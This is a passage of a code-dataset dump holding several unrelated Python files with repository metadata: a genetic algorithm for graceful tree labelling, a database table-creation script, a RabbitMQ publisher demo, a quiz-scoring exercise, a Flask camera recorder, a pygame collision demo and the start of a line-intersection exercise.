populate(population_size, number_positions, tree, weights, distances):\r\n population = []\r\n for i in range(population_size):\r\n nA,nB = 0,0\r\n while nB < 2:\r\n nodeA, nodeB = chooseConnection(weights, distances)\r\n assignments, nA, nB = assignTrees(distances, nodeA, nodeB)\r\n \r\n # make two list of independent random assignments within each half of the tree\r\n offset = random.randrange(1,nB)\r\n subtreeA = random.sample(range(offset, offset + nA), nA)\r\n subtreeB0 = random.sample(range(offset + nA, offset + N), nB)\r\n subtreeB = [subtreeB0[i]%N for i in range(nB)] # wrap around the values which exceed N\r\n \r\n # put them together based on the original tree\r\n this_list = []\r\n j,k = 0,0\r\n for i in range(N):\r\n if assignments[i] == 0:\r\n this_list.append(subtreeA[j])\r\n j += 1\r\n if assignments[i] == 1:\r\n this_list.append(subtreeB[k])\r\n k += 1\r\n \r\n this_value,these_troublemakers = judge(this_list, tree, weights, distances)\r\n population.append((this_list, this_value, these_troublemakers, nodeA,nodeB, assignments, nA,nB, offset))\r\n return population\r\n\r\ndef repopulate(population_size, number_children, tree, weights, distances, population):\r\n new_population = []\r\n \r\n for i in range(number_children):\r\n choice = random.randint(0, population_size-1)\r\n kid = population[choice][0].copy()\r\n nodeA,nodeB, assignments, nA,nB, offset = population[choice][3:]\r\n print(\"nodeA\",nodeA,\"nodeB\",nodeB,\"offset\",offset)\r\n \r\n troublemakers = list(dict.fromkeys(population[choice][2]))\r\n # note which subtrees have troublemakers\r\n bad_trees = []\r\n i = 0\r\n while i < len(troublemakers):\r\n trouble = kid.index(troublemakers[i])\r\n bad_trees.append(assignments[trouble])\r\n i += 1\r\n \r\n # shuffle the troublemakers\r\n j = 0\r\n while j < len(troublemakers):\r\n trouble = kid.index(troublemakers[j])\r\n rando = random.randrange(N)\r\n \r\n if assignments[trouble] == assignments[rando]:\r\n kid[rando],kid[trouble] = kid[trouble],kid[rando]\r\n j += 1\r\n \r\n # then, shuffle some more\r\n shuffles = random.randrange(-1, int(N / (len(troublemakers) + 1)))\r\n # shuffles = random.randrange(1,N)\r\n while shuffles > 0:\r\n flippers = random.sample(range(N), 2)\r\n rando1 = flippers[0]\r\n rando2 = flippers[1]\r\n \r\n if assignments[rando1] == assignments[rando2] and assignments[rando1] in bad_trees:\r\n kid[rando2],kid[rando1] = kid[rando1],kid[rando2]\r\n shuffles -= 1\r\n \r\n kid_value,kid_troublemakers = judge(kid, tree, weights, distances)\r\n new_population.append((kid, kid_value, kid_troublemakers, nodeA,nodeB, assignments, nA,nB, offset))\r\n return new_population\r\n\r\ndef getBestPop(population, new_population, J):\r\n all_population = population + new_population\r\n best_population = sorted(all_population, key = lambda x: x[1][J])\r\n return best_population[:len(population)]\r\n\r\ndef matrix_to_AL(matrix, nodes):\r\n adjacency_list = []\r\n for i in range(nodes):\r\n temp = str(i)\r\n for j in range(nodes):\r\n foo = matrix[i][j]\r\n if(j>i and foo == 1):\r\n temp += \" \" + str(j)\r\n adjacency_list.append(temp)\r\n return adjacency_list\r\n\r\ndef f(number):\r\n #format to 3 sig figs\r\n return int(number*1000)/1000\r\n\r\ndef trendAverage(trends):\r\n trend = []\r\n rows = len(trends[0])\r\n cols = len(trends)\r\n T = [[trends[j][i] for j in range(cols)] for i in range(rows)]\r\n for r in T:\r\n trend.append(sum(r)/len(r))\r\n return trend\r\n\r\ndef custom_tree():\r\n return nx.read_adjlist(\"tree.txt\", nodetype=int)\r\n\r\ndef 
findSolution(N,S,J):\r\n nodes = N\r\n maxIter = 1000\r\n population_size = 100\r\n number_children = int(population_size / 2)\r\n \r\n seed = S\r\n tree = nx.random_tree(nodes,seed=seed)\r\n graph_tree(tree,1,nodes,seed)\r\n problem_matrix = tree_to_matrix(tree,nodes)\r\n print()\r\n print(\"Now on seed\",S)\r\n #print_matrix(problem_matrix)\r\n weights,distances = assignWeights(problem_matrix)\r\n print()\r\n #print_matrix(distances)\r\n #print(weights)\r\n \r\n best1 = [(N**2) * 2 * sum(weights)] * 3 # initialize to a high value\r\n trend = []\r\n \r\n population = populate(population_size, nodes, problem_matrix, weights, distances)\r\n \r\n start = time.time()\r\n for i in range(maxIter):\r\n new_population = repopulate(population_size, number_children, problem_matrix, weights, distances, population)\r\n population = getBestPop(population, new_population, J)\r\n if population[0][1][J] < best1[J]:\r\n best0 = population[0][0]\r\n best1 = population[0][1]\r\n best2 = population[0][2]\r\n print(\"new best\",best1,\"on tick\",i,\"and it's\",best0,\"and the troublemakers are\",best2)\r\n # trend.append(best1[J])\r\n if len(population[0][2]) == 0:\r\n break\r\n if i%50 == 0:\r\n print(\"now on tick\",i)\r\n end = time.time()\r\n \r\n solve_time = f(end - start)\r\n # if len(trend) < maxIter:\r\n # trend += [best1] * (maxIter - len(trend))\r\n \r\n sorted_population = sorted(population, key = lambda x: x[1])\r\n best_solution = sorted_population[0]\r\n best_value = best_solution[1][J]\r\n print(\"Best solution value:\",best_solution[1][J])\r\n if best_value > 0:\r\n print(\"Local Optimal Solution Found!\")\r\n id = 2\r\n else:\r\n print(\"Global Optimal Solution Found!\")\r\n id = 3\r\n solution_matrix = reorder(listToMatrix(best_solution[0]),problem_matrix)\r\n print_matrix(solution_matrix)\r\n AL = matrix_to_AL(solution_matrix, nodes)\r\n solution_tree = nx.parse_adjlist(AL, nodetype=int)\r\n graph_tree(solution_tree,id,nodes,seed,solve_time,int(best_value))\r\n \r\n return solve_time,id,trend, best_solution[1]\r\n\r\nif __name__ == '__main__':\r\n nMin = 30\r\n nMax = 30\r\n nInc = 5\r\n \r\n sMin = 0\r\n sMax = 1\r\n seeds = sMax-sMin\r\n seedList = [0,2,5,7,10,11,13,14,15,16,21,23,26,27,29,30,31,33,36,41,42,43,48,51,57,63,66,69,74,75,77,78,80,83,85,89,91,92,96,98]\r\n \r\n J = judgement_choice = 2 # 0=conflicts , 1=unused , 2=unused_weighted\r\n \r\n times = []\r\n solves = []\r\n Ntrends = []\r\n \r\n conflict_sum = 0\r\n unused = 0\r\n unused_weighted = 0\r\n \r\n # with open('results_splitting.csv', mode='w', newline='') as results_file:\r\n # results_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n # results_writer.writerow([\"Perfect\",\"Time\",\"Nodes\",\"Seed\",\"Evaluator\",\"Conflicts\",\"Unused\",\"Unused_Weighted\"])\r\n \r\n N = nMin\r\n while N <= nMax:\r\n totalTime = 0\r\n perfectSolves = 0\r\n # trends = []\r\n for S in seedList[sMin:sMax]:\r\n solveTime,id,trend, judgements = findSolution(N,S,J)\r\n \r\n totalTime += solveTime\r\n perfectSolves += (id-2)\r\n # trends.append(trend)\r\n \r\n conflict_sum += judgements[0]\r\n unused += judgements[1]\r\n unused_weighted += judgements[2]\r\n \r\n with open('results_splitting.csv', mode='a+', newline='') as results_file:\r\n results_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n results_writer.writerow([id-2,solveTime,N,seedList.index(S),J,judgements[0],judgements[1],judgements[2]])\r\n \r\n average = f(totalTime/seeds)\r\n 
times.append(average)\r\n solves.append(perfectSolves)\r\n # Ntrend = trendAverage(trends)\r\n # Ntrends.append(Ntrend)\r\n N += nInc\r\n \r\n print()\r\n \r\n N = nMin\r\n i=0\r\n while N <= nMax:\r\n print(\"Splitting\")\r\n print(\"Judgement choice:\",J)\r\n print(\"Average time for\",N,\"nodes:\",times[i],\"seconds\")\r\n print(\"\\t Perfect solutions:\",solves[i],\"out of\",seeds)\r\n print(\"\\t Average conflicts remaining:\",f(conflict_sum/seeds))\r\n print(\"\\t Average unused edge labels:\",f(unused/seeds))\r\n print(\"\\t Average unused (weighted):\",f(unused_weighted/seeds))\r\n N += nInc\r\n i += 1","repo_name":"Mike-Arnold/Graceful","sub_path":"graceful_splitting.py","file_name":"graceful_splitting.py","file_ext":"py","file_size_in_byte":18079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33962744115","text":"#Import statements\nimport sys\nimport os\nimport argparse\nimport configparser\nimport psycopg2\nimport logging\nimport csv\n\n'''\n\n'''\n\n#Main Function\ndef main ():\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n handlers=[logging.FileHandler('/tmp/{}.log'.format(os.path.splitext(sys.argv[0])[0])),\n logging.StreamHandler()])\n os.chdir(sys.path[0])\n auth = get_config_params('config.ini')\n args = parse_args()\n \n with open(\"/usr/src/app/cHazard/{prov}/cH_{prov}_hmaps.csv\".format(**{'prov':args.province}), \"r\") as f:\n reader = csv.reader(f)\n hmapColumns = next(reader)\n hmapColumns = ','.join('\"{0}\"'.format(w) for w in hmapColumns)\n hmapColumns = hmapColumns.replace('-','_')\n hmapColumns = hmapColumns.replace('\"lon\"','lon')\n hmapColumns = hmapColumns.replace('\"lat\"','lat')\n # hmapColumns = hmapColumns.replace('\"PGA_0.02\"','PGA_0.02')\n # hmapColumns = hmapColumns.replace('\"PGA_0.1\"','PGA_0.02')\n\n with open(\"/usr/src/app/cHazard/{prov}/cH_{prov}_uhs.csv\".format(**{'prov':args.province}), \"r\") as f:\n reader = csv.reader(f)\n uhsColumns = next(reader)\n uhsColumns = ','.join('\"{0}\"'.format(w) for w in uhsColumns)\n uhsColumns = uhsColumns.replace('~','_')\n uhsColumns = uhsColumns.replace('\"lon\"','lon')\n uhsColumns = uhsColumns.replace('\"lat\"','lat')\n # uhsColumns = uhsColumns.replace('\"0.2_PGA\"','0.2_PGA')\n\n sqlquerystring = open(args.sqlScript, 'r').read().format(**{\n 'prov':args.province, \n 'hmapColumns':hmapColumns,\n 'uhsColumns':uhsColumns})\n \n\n try:\n connection = psycopg2.connect(user = auth.get('rds', 'postgres_un'),\n password = auth.get('rds', 'postgres_pw'),\n host = auth.get('rds', 'postgres_host'),\n port = auth.get('rds', 'postgres_port'),\n database = auth.get('rds', 'postgres_db'))\n cursor = connection.cursor()\n cursor.execute(sqlquerystring)\n #cursor.commit()\n connection.commit()\n\n except (Exception, psycopg2.Error) as error :\n logging.error(error)\n\n finally:\n if(connection):\n cursor.close()\n connection.close()\n\n return\n\n\n#Support Functions\ndef get_config_params(args):\n \"\"\"\n Parse Input/Output columns from supplied *.ini file\n \"\"\"\n configParseObj = configparser.ConfigParser()\n configParseObj.read(args)\n return configParseObj\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='''''')\n parser.add_argument(\"--province\", type=str, help=\"Two letter province/territory identifier\")\n parser.add_argument(\"--sqlScript\", type=str, help=\"PSRA SQL Script to Run\")\n args = parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n main() 
","repo_name":"OpenDRR/model-factory","sub_path":"scripts/PSRA_runCreate_tables.py","file_name":"PSRA_runCreate_tables.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7455406103","text":"import pika\nimport sys\n\nusername = \"shiwei\"\npwd = 'shiwei666666'\nuser_pwd = pika.PlainCredentials(username, pwd)\n\n# 创建连接\nconn = pika.BlockingConnection(pika.ConnectionParameters(\"localhost\", credentials=user_pwd))\n\nchannel = conn.channel()\n\nchannel.exchange_declare(exchange='topic_logs',\n exchange_type='topic')\n\nrouting_key = sys.argv[1] if len(sys.argv) > 1 else 'anonymous.info'\nmessage = ' '.join(sys.argv[2:]) or 'Hello World!'\nchannel.basic_publish(exchange='topic_logs',\n routing_key=routing_key,\n body=message)\nprint(\" [x] Sent %r:%r\" % (routing_key, message))\nconn.close()\n\n","repo_name":"SuoSuo-Rocky/RabbitMQ-FullStack","sub_path":"RabbitMQ_Demo/发布_订阅_广播,一对多/topic_exchange/Demo01/topic_send.py","file_name":"topic_send.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73558002064","text":"def correct(nums, solution):\n red = [i for i in range(1,6)]\n blue = [i for i in range(5, 0, -1)]\n yellow = [3, 3, 3, 3, 3]\n\n def color(color, nums, solution):\n key = []\n i = 0 \n while i < nums:\n if i >= len(red):\n key.append(color[i - len(red)])\n else: \n key.append((color[i]))\n i += 1\n\n score = []\n for j in range(len(key)):\n if key[j] == solution[j]:\n score.append(True)\n \n return score.count(True)\n \n red_correct_count = color(red, nums, solution)\n blue_correct_count = color(blue, nums, solution)\n yellow_correct_count = color(yellow, nums, solution)\n \n\n max_val = max(red_correct_count,blue_correct_count,yellow_correct_count)\n print(max_val)\n \n result_dict = {'red':red_correct_count, 'blue':blue_correct_count, 'yellow':yellow_correct_count}\n \n final = []\n \n for k, v in result_dict.items():\n if v == max_val:\n final.append(k)\n \n if len(final) == 3:\n return final[0], final[1], final[2]\n elif len(final) == 2:\n return final[0], final[1]\n else:\n return final[0]\n \n\ndef main():\n nums = int(input())\n solution = list(map(int, input().split()))\n print(correct(nums, solution))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"haenara-shin/CodingTestChallenges","sub_path":"Elice/[Elice] RandomSolving_Elice.py","file_name":"[Elice] RandomSolving_Elice.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25361711144","text":"import cv2\nimport threading\n\n\nclass RecordingThread(threading.Thread):\n def __init__(self, name, camera):\n threading.Thread.__init__(self)\n self.name = name\n self.isRunning = True\n\n self.cap = camera\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n self.out = cv2.VideoWriter('./static/video.avi', fourcc, 20.0, (640, 480))\n\n def run(self):\n while self.isRunning:\n ret, frame = self.cap.read()\n if ret:\n self.out.write(frame)\n\n self.out.release()\n\n def stop(self):\n self.isRunning = False\n\n def __del__(self):\n self.out.release()\n\n\nclass VideoCamera(object):\n def __init__(self):\n # 打开摄像头, 0代表笔记本内置摄像头\n self.cap = cv2.VideoCapture(0)\n\n # 初始化视频录制环境\n self.is_record = False\n self.out = None\n\n # 视频录制线程\n self.recordingThread = None\n\n # 退出程序释放摄像头\n def __del__(self):\n self.cap.release()\n\n def 
\n def get_frame(self):\n ret, frame = self.cap.read()\n\n if ret:\n ret, jpeg = cv2.imencode('.jpg', frame)\n\n # video recording\n if self.is_record:\n if self.out == None:\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n self.out = cv2.VideoWriter('./static/video.avi', fourcc, 20.0, (640, 480))\n\n ret, frame = self.cap.read()\n if ret:\n self.out.write(frame)\n else:\n if self.out != None:\n self.out.release()\n self.out = None\n\n return jpeg.tobytes()\n\n else:\n return None\n\n def start_record(self):\n self.is_record = True\n self.recordingThread = RecordingThread(\"Video Recording Thread\", self.cap)\n self.recordingThread.start()\n\n def stop_record(self):\n self.is_record = False\n\n if self.recordingThread != None:\n self.recordingThread.stop()\n","repo_name":"Kr1s77/flask-video-streaming-recorder","sub_path":"controller/utils/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"48"} +{"seq_id":"19650260251","text":"class Book():\n def __init__(self, title, description, author, genre, checked_out, cover_url, urn):\n self.title = title\n self.description = description\n self.author = author\n self.genre = genre\n self.checked_out = checked_out\n self.cover_url = cover_url\n self.lent_to = []\n self.urn = urn\n","repo_name":"conradr/Week_3_Library_Flask","sub_path":"models/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15921255823","text":"from pwcolor import *\r\nfrom graphics import *\r\nfrom e32 import *\r\nfrom pwfill import *\r\nimport _graphics\r\nimport sysinfo\r\n\r\n__all__ = [\"PWCanvas\"]\r\n\r\nclass PWCanvas(Image):\r\n def round_rectangle(self, pos, r=5, outline=None, fill=None, opacity=1):\r\n o = outline\r\n f = fill\r\n op = int(opacity * 255)\r\n #create alpha mask if needed\r\n if isinstance(fill, PWFill) or (op < 255):\r\n size = (pos[2]-pos[0], pos[3]-pos[1])\r\n alpha_pos = (0,0,size[0],size[1])\r\n alpha = PWCanvas.new(size,'L')\r\n alpha.clear(0)\r\n self._round_rectangle(alpha, alpha_pos, r, fill=(op,op,op))\r\n\r\n if isinstance(fill, PWFill):\r\n #create the gradient and apply the mask\r\n gradient = PWCanvas.new(size)\r\n fill.gradient_fill(gradient)\r\n self.blit(gradient, target=(pos[0],pos[1]), mask=alpha)\r\n else: \r\n #solid color\r\n if op == 255: \r\n #simple round_rectangle solid colored\r\n self._round_rectangle(self, pos, r, outline=o, fill=f)\r\n else: \r\n #use mask to make rectangle transparent\r\n rrect = PWCanvas.new(size)\r\n self._round_rectangle(rrect, alpha_pos, r, fill=f)\r\n self.blit(rrect, target=(pos[0],pos[1]), mask=alpha)\r\n\r\n def _round_rectangle(self, canvas, pos, r=5, outline=None, fill=None):\r\n \"\"\"Draws a rounded rectangle on a PWCanvas using the following parameters:\r\n * canvas = a PWCanvas object or Image object\r\n * r = corner radius\r\n * outline = color of outline\r\n * fill = an RGB tuple or 0xRRGGBB integer\r\n \"\"\"
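\r\n #geometry note: four corner circles, four edge rectangles and one body rectangle cover the shape; the outline is drawn on top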
\r\n #Just to make things shorter ;)\r\n o = outline\r\n f = fill\r\n if r > 0:\r\n d = r * 2 #diameter\r\n #corner circles\r\n canvas.ellipse((pos[0], pos[1], pos[0] + d, pos[1] + d), outline=o, fill=f)\r\n canvas.ellipse((pos[2] - d, pos[3] - d, pos[2], pos[3]), outline=o, fill=f)\r\n canvas.ellipse((pos[0], pos[3] - d, pos[0] + d, pos[3]), outline=o, fill=f)\r\n canvas.ellipse((pos[2] - d, pos[1], pos[2], pos[1] + d), outline=o, fill=f)\r\n #border rectangles\r\n canvas.rectangle((pos[0] + r, pos[1], pos[2] - r, pos[1] + r), outline=None, fill=f)\r\n canvas.rectangle((pos[0] + r, pos[3] - r, pos[2] - r, pos[3]), outline=None, fill=f)\r\n canvas.rectangle((pos[0], pos[1] + r, pos[0] + r, pos[3] - r), outline=None, fill=f)\r\n canvas.rectangle((pos[2] - r, pos[1] + r, pos[2], pos[3] - r), outline=None, fill=f)\r\n #body\r\n canvas.rectangle((pos[0] + r, pos[1] + r,pos[2] - r, pos[3] - r), outline=None, fill=f)\r\n #borders\r\n if fill is not None:\r\n canvas.line((pos[0] + r, pos[1], pos[2] - r, pos[1]), outline=o)\r\n canvas.line((pos[0] + r, pos[3], pos[2] - r, pos[3]), outline=o)\r\n canvas.line((pos[0], pos[1] + r, pos[0], pos[3] - r), outline=o)\r\n canvas.line((pos[2], pos[1] + r, pos[2], pos[3] - r), outline=o)\r\n else:\r\n #if r == 0 then the round_rectangle is just a rectangle. Let's make things simple\r\n canvas.rectangle(pos, outline=None, fill=f)\r\n\r\n def new(size, mode='RGB'):\r\n \"\"\" rewrite the static \"new\" method to\r\n return a PWCanvas instead of an Image\"\"\"\r\n if not Image._modemap.has_key(mode):\r\n raise ValueError('invalid mode')\r\n return PWCanvas(_graphics.ImageNew(size,Image._modemap[mode]))\r\n\r\n new = staticmethod(new)","repo_name":"SymbiSoft/pys60widgets","sub_path":"src/pwcanvas.py","file_name":"pwcanvas.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32814348223","text":"import math, random, sys\nimport pygame\nfrom pygame.locals import *\n\ndef rot_center(image, angle):\n \"\"\"rotate an image while keeping its center and size\"\"\"\n orig_rect = image.get_rect()\n rot_image = pygame.transform.rotate(image, angle)\n rot_rect = orig_rect.copy()\n rot_rect.center = rot_image.get_rect().center\n rot_image = rot_image.subsurface(rot_rect).copy()\n return rot_image\n\n# define display surface\t\t\t\nW, H = 1080, 600\nHW, HH = W / 2, H / 2\nAREA = W * H\nleg_offset, leg_height, difference = 50, 40, 27\nleg_length = 9.7\n\n# initialise display\npygame.init()\nCLOCK = pygame.time.Clock()\nDS = pygame.display.set_mode((W, H))\npygame.display.set_caption(\"code.Pylet - Pixel Perfect Collision\")\nFPS = 120\n\n# define some colors\nBLACK = (0, 0, 0, 255)\nWHITE = (255, 255, 255, 255)\n\nobstacle = pygame.image.load(\"obstacle-400x399.png\").convert_alpha()\nbackground = pygame.image.load(\"image_resources/blue.jpg\").convert_alpha()\nobstacle_mask = pygame.mask.from_surface(obstacle)\nobstacle_rect = obstacle.get_rect()\nox = HW - obstacle_rect.center[0]\noy = HH - obstacle_rect.center[1]\n\nleg, leg_mask, leg_rect = [],[],[]\nfor i in range(0,6):\n\tleg.append(pygame.image.load(\"image_resources/leg.png\").convert_alpha())\n\tleg_mask.append(pygame.mask.from_surface(leg[i]))\n\tleg_rect.append(leg[i].get_rect())\n\n\nleg.append(pygame.image.load(\"image_resources/body.png\").convert_alpha())\nleg_mask.append(pygame.mask.from_surface(leg[6]))\nleg_rect.append(leg[6].get_rect())\n\nleg.append(pygame.image.load(\"image_resources/body.png\").convert_alpha())\nleg_mask.append(pygame.mask.from_surface(leg[7]))\nleg_rect.append(leg[7].get_rect())\n\nleg.append(pygame.image.load(\"image_resources/head.png\").convert_alpha())\nleg_mask.append(pygame.mask.from_surface(leg[8]))\nleg_rect.append(leg[8].get_rect())\n\nmx, my = 0 , 0\nmovex,movey = 0, 0
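\n# rotate[i] holds each part's current angle; spin[i] is its per-frame angular velocity, set from the keyboard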
\nrotate, spin = [0.0,0.0,0.0,0.0,0.0,0.0],[0.0,0.0,0.0,0.0,0.0,0.0]\ntemp = [[0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]\ntemp_two = [[0.0, 0.0], [0.0, 0.0]]\n\n# main loop\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_r:\n\t\t\t\tspin[0] += 1.0\n\t\t\tif event.key == K_t:\n\t\t\t\tspin[0] -= 1.0\n\t\t\tif event.key == K_f:\n\t\t\t\tspin[1] += 1.0\n\t\t\tif event.key == K_g:\n\t\t\t\tspin[1] -= 1.0\n\t\t\tif event.key == K_v:\n\t\t\t\tspin[2] += 1.0\n\t\t\tif event.key == K_b:\n\t\t\t\tspin[2] -= 1.0\n\t\t\tif event.key == K_h:\n\t\t\t\tspin[3] += 1.0\n\t\t\tif event.key == K_j:\n\t\t\t\tspin[3] -= 1.0\n\t\t\tif event.key == K_y:\n\t\t\t\tspin[4] += 1.0\n\t\t\tif event.key == K_u:\n\t\t\t\tspin[4] -= 1.0\n\t\t\tif event.key == K_n:\n\t\t\t\tspin[5] += 1.0\n\t\t\tif event.key == K_m:\n\t\t\t\tspin[5] -= 1.0\n\t\t\telif event.key == K_a:\n\t\t\t\tmovex = -1\n\t\t\telif event.key == K_d:\n\t\t\t\tmovex = 1\n\t\t\telif event.key == K_w:\n\t\t\t\tmovey = -1\n\t\t\telif event.key == K_s:\n\t\t\t\tmovey = 1\n\t\tif event.type == KEYUP:\n\t\t\tif event.key == K_r or event.key == K_t:\n\t\t\t\tspin[0] = 0.0\n\t\t\tif event.key == K_f or event.key == K_g:\n\t\t\t\tspin[1] = 0.0\n\t\t\tif event.key == K_v or event.key == K_b:\n\t\t\t\tspin[2] = 0.0\n\t\t\tif event.key == K_h or event.key == K_j:\n\t\t\t\tspin[3] = 0.0\n\t\t\tif event.key == K_y or event.key == K_u:\n\t\t\t\tspin[4] = 0.0\n\t\t\tif event.key == K_n or event.key == K_m:\n\t\t\t\tspin[5] = 0.0\n\t\t\telif event.key == K_a:\n\t\t\t\tmovex = 0\n\t\t\telif event.key == K_d:\n\t\t\t\tmovex = 0\n\t\t\telif event.key == K_w:\n\t\t\t\tmovey = 0\n\t\t\telif event.key == K_s:\n\t\t\t\tmovey = 0\n\n\tfor i in range(0,6):\n\t\trotate[i] += spin[i]\n\t\trotate[i] = rotate[i] % 360\n\t\tif i < 3:\n\t\t\tleg[i] = pygame.image.load(\"image_resources/leg.png\").convert_alpha()\n\t\t\tleg[i] = rot_center(leg[i], rotate[i])\n\t\t\tleg_mask[i] = pygame.mask.from_surface(leg[i])\n\t\t\tleg_rect[i] = leg[i].get_rect()\n\n\tleg[6] = pygame.image.load(\"image_resources/body.png\").convert_alpha()\n\tleg[6] = rot_center(leg[6], rotate[4])\n\tleg_mask[6] = pygame.mask.from_surface(leg[6])\n\tleg_rect[6] = leg[6].get_rect()\n\tleg[7] = pygame.image.load(\"image_resources/body.png\").convert_alpha()\n\tleg[7] = rot_center(leg[7], rotate[3])\n\tleg_mask[7] = pygame.mask.from_surface(leg[7])\n\tleg_rect[7] = leg[7].get_rect()\n\tleg[8] = pygame.image.load(\"image_resources/head.png\").convert_alpha()\n\tleg[8] = rot_center(leg[8], rotate[5])\n\tleg_mask[8] = pygame.mask.from_surface(leg[8])\n\tleg_rect[8] = leg[8].get_rect()\n\n\n\tmx += movex\n\tmy += movey\n\n\tfor i in range(0,3):\n\t\toffset = (int(mx + leg_offset + (i * difference) - ox), int(my + leg_height - oy))\n\t\tresult = obstacle_mask.overlap(leg_mask[i], offset)\n\t\tfor j in range(0,3):\n\t\t\tif i != j and not result:\n\t\t\t\toffset = (int((mx + leg_offset + (i * difference)) - (mx + leg_offset + (j * difference))), int(0.0))\n\t\t\t\tresult = leg_mask[j].overlap(leg_mask[i], offset)\n\n\t\tif result:\n\t\t\tmx -= movex\n\t\t\tmy -= movey\n\t\t\tif spin[i] != 0.0:\n\t\t\t\trotate[i] -= spin[i]\n\t\t\t\tleg[i] = pygame.image.load(\"image_resources/leg.png\").convert_alpha()\n\t\t\t\tleg[i] = rot_center(leg[i], rotate[i])\n\t\t\t\tleg_mask[i] = pygame.mask.from_surface(leg[i])\n\t\t\t\tleg_rect[i] = leg[i].get_rect()\n
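\n\t# convert each angle (degrees) to x/y offsets that chain the leg, body and head sprites together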
\n\tfor i in range(0, 3):\n\t\ttemp[i][0] = math.sin(rotate[i] / 180 * math.pi) * leg_length\n\t\ttemp[i][1] = -math.cos((180.0 + rotate[i]) / 180 * math.pi) * leg_length\n\tfor i in range(3, 5):\n\t\ttemp[i][0] = math.cos(rotate[i] / 180 * math.pi)\n\t\ttemp[i][1] = math.sin((180.0 + rotate[i]) / 180 * math.pi)\n\t\ttemp_two[i - 3][0] = -math.sin((180.0 + rotate[i]) / 180 * math.pi) * 4\n\t\ttemp_two[i - 3][1] = math.cos(rotate[i] / 180 * math.pi) * 4\n\n\tprint(temp_two[1][0], \" \", temp_two[1][1])\n\n\tDS.blit(background, (int(0), int(0)))\n\tDS.blit(obstacle, (int(ox), int(oy)))\n\tDS.blit(leg[6], (int(mx), int(my)))\n\tDS.blit(leg[7], (int(mx + (temp[4][0] * 39)), int(my + (temp[4][1] * 39))))\n\tDS.blit(leg[8], (int(mx + (temp[4][0] * 39) + (temp[3][0] * 39)), int(my + (temp[4][1] * 39) + (temp[3][1] * 39))))\n\n\tDS.blit(leg[0], (int(mx + 38 + (temp[4][0] * 12) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 12) + temp_two[1][1])))\n\tDS.blit(leg[1], (int(mx + 38 + (temp[4][0] * 39) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 39) + temp_two[1][1])))\n\tDS.blit(leg[2], (int(mx + 38 + (temp[4][0] * 41) + (temp[3][0] * 25) + temp_two[0][0]), int(my + 40 + (temp[4][1] * 41) + (temp[3][1] * 25) + temp_two[0][1])))\n\n\tDS.blit(leg[3], (int(mx + 38 + (temp[4][0] * 12) + (temp[0][0] * 1.15) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 12) + (temp[0][1] * 1.15) + temp_two[1][1])))\n\tDS.blit(leg[4], (int(mx + 38 + (temp[4][0] * 39) + (temp[1][0] * 1.15) + temp_two[1][0]), int(my + 40 + (temp[4][1] * 39) + (temp[1][1] * 1.15) + temp_two[1][1])))\n\tDS.blit(leg[5], (int(mx + 38 + (temp[4][0] * 41) + (temp[3][0] * 25) + (temp[2][0] * 1.15) + temp_two[0][0]), int(my + 40 + (temp[4][1] * 41) + (temp[3][1]) * 25 + (temp[2][1] * 1.15) + temp_two[0][1])))\n\n\tpygame.display.update()\n\tCLOCK.tick(FPS)\n\tDS.fill(BLACK)","repo_name":"solanylander/PRJ-AgentTower","sub_path":"pixelperfect.py","file_name":"pixelperfect.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22819367937","text":"\"\"\"\n03/05/2023\n\nSource: https://dojopuzzles.com/problems/interseccao-de-segmentos-de-reta/\n\nProblem statement: Intersection of line segments\n\nIn geometry, a common problem is to determine whether two lines, defined from point A to B and from C to D respectively, cross each other.\n\nDevelop a Linha2D class with the following features:\n\nA line is built by providing two points A=(x1,y1) and B=(x2,y2);\nA line L1 must be able to answer the question \"Do I cross line L2?\".\nThis problem illustrates some issues associated with geometric algorithms and with floating-point/numeric algorithms; what should we do about rounding problems?\n\nParticipants:\n- Everton Matos\n- Álisson S. Holkem\n- João Moreno\n- Gregorio\n- Luiz Carlos\n- Márcio Conrado\n- Fred\n- \n\"\"\"\n\nimport pytest\n\n\ndef ponto(x, y):\n return (x, y)\n\n\ndef linha(ponto_a, ponto_b):\n return [ponto_a, ponto_b]\n\n\ndef interseccao(linha_1, linha_2):
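\n # determinant (Cramer's rule) solve: a zero determinant means the direction vectors are parallel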
